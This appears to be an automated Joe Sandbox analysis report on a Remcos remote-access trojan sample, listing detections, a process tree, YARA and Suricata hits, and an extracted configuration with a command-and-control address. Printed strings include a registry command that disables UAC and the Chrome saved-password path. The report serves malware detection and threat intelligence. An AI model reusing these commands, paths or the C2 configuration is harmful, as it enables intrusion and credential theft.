Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yPIOW6yoPi.exe

Overview

General Information

Sample name:yPIOW6yoPi.exe
renamed because original name is a hash value
Original sample name:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347.exe
Analysis ID:1588844
MD5:a0acd7920f09a59331e008f8d3dc7ac1
SHA1:f6bf51b2bccc91476136e43a91b17076ed78b083
SHA256:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347
Tags:exeRemcosRATuser-adrian__luca
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yPIOW6yoPi.exe (PID: 1612 cmdline: "C:\Users\user\Desktop\yPIOW6yoPi.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
    • WerFault.exe (PID: 3352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6248 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • yavascript.exe (PID: 1512 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
      • WerFault.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • yavascript.exe (PID: 4196 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
    • WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • yavascript.exe (PID: 1352 cmdline: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" MD5: A0ACD7920F09A59331E008F8D3DC7AC1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 87 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.yavascript.exe.750e67.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        17.2.yavascript.exe.750e67.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          17.2.yavascript.exe.750e67.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            17.2.yavascript.exe.750e67.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6aaf8:$a1: Remcos restarted by watchdog!
            • 0x6b070:$a3: %02i:%02i:%02i:%03i
            17.2.yavascript.exe.750e67.1.unpackREMCOS_RAT_variantsunknownunknown
            • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
            • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x64e04:$str_b2: Executing file:
            • 0x65c3c:$str_b3: GetDirectListeningPort
            • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x65780:$str_b7: \update.vbs
            • 0x64e2c:$str_b9: Downloaded file:
            • 0x64e18:$str_b10: Downloading file:
            • 0x64ebc:$str_b12: Failed to upload file:
            • 0x65c04:$str_b13: StartForward
            • 0x65c24:$str_b14: StopForward
            • 0x656d8:$str_b15: fso.DeleteFile "
            • 0x6566c:$str_b16: On Error Resume Next
            • 0x65708:$str_b17: fso.DeleteFolder "
            • 0x64eac:$str_b18: Uploaded file:
            • 0x64e6c:$str_b19: Unable to delete:
            • 0x656a0:$str_b20: while fso.FileExists("
            • 0x65349:$str_c0: [Firefox StoredLogins not found]
            Click to see the 139 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\xenor\yavascript.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yPIOW6yoPi.exe, ProcessId: 1612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-I7G983

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: 1E 04 D2 DB 3F 0C FE F3 82 62 77 23 55 F6 79 B1 49 36 BC E5 8F 32 CD 27 A0 CB 6E 6A 9F 1A 20 B0 87 53 A6 49 46 14 C8 00 36 A6 D3 34 C0 ED 1C E0 39 9D 39 D1 15 0E C3 90 91 15 47 75 AC 34 37 C5 71 C4 5B 5A BB 89 3F B2 EC 68 87 0C EB 47 9D 30 F2 73 49 70 31 DF 74 DA 6A E1 4D 5F 63 46 B7 13 85 71 44 89 2D 9B 50 50 FC E0 75 12 7B 62 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\xenor\yavascript.exe, ProcessId: 1512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-I7G983\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T06:12:49.237371+010020365941Malware Command and Control Activity Detected192.168.2.649753198.23.227.21232583TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T06:13:01.128869+010028033043Unknown Traffic192.168.2.649828178.237.33.5080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: yPIOW6yoPi.exeAvira: detected
            Found malware configuration
            Source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I7G983", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeReversingLabs: Detection: 71%
            Multi AV Scanner detection for submitted file
            Source: yPIOW6yoPi.exeReversingLabs: Detection: 71%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: yPIOW6yoPi.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043293A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02122BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_02122BA1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_0043293A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00782BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00782BA1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_0043293A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02162BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_02162BA1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,38_2_0043293A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B2BA1 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,38_2_021B2BA1
            Source: yPIOW6yoPi.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

            Privilege Escalation

            barindex
            Contains functionality to bypass UAC (CMSTPLUA)
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00406764 _wcslen,CoGetObject,17_2_00406764
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00406764 _wcslen,CoGetObject,20_2_00406764
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00406764 _wcslen,CoGetObject,38_2_00406764
            Source: yPIOW6yoPi.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B42F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044D5E9 FindFirstFileExA,0_2_0044D5E9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C69
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_020F900E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0210B696
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020FB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_020FB59C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0213D850 FindFirstFileExA,0_2_0213D850
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02108ED0 FindFirstFileW,0_2_02108ED0
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_020F7CF3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F6D29 FindFirstFileW,FindNextFileW,0_2_020F6D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0044D5E9 FindFirstFileExA,17_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,17_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00406AC2 FindFirstFileW,FindNextFileW,17_2_00406AC2
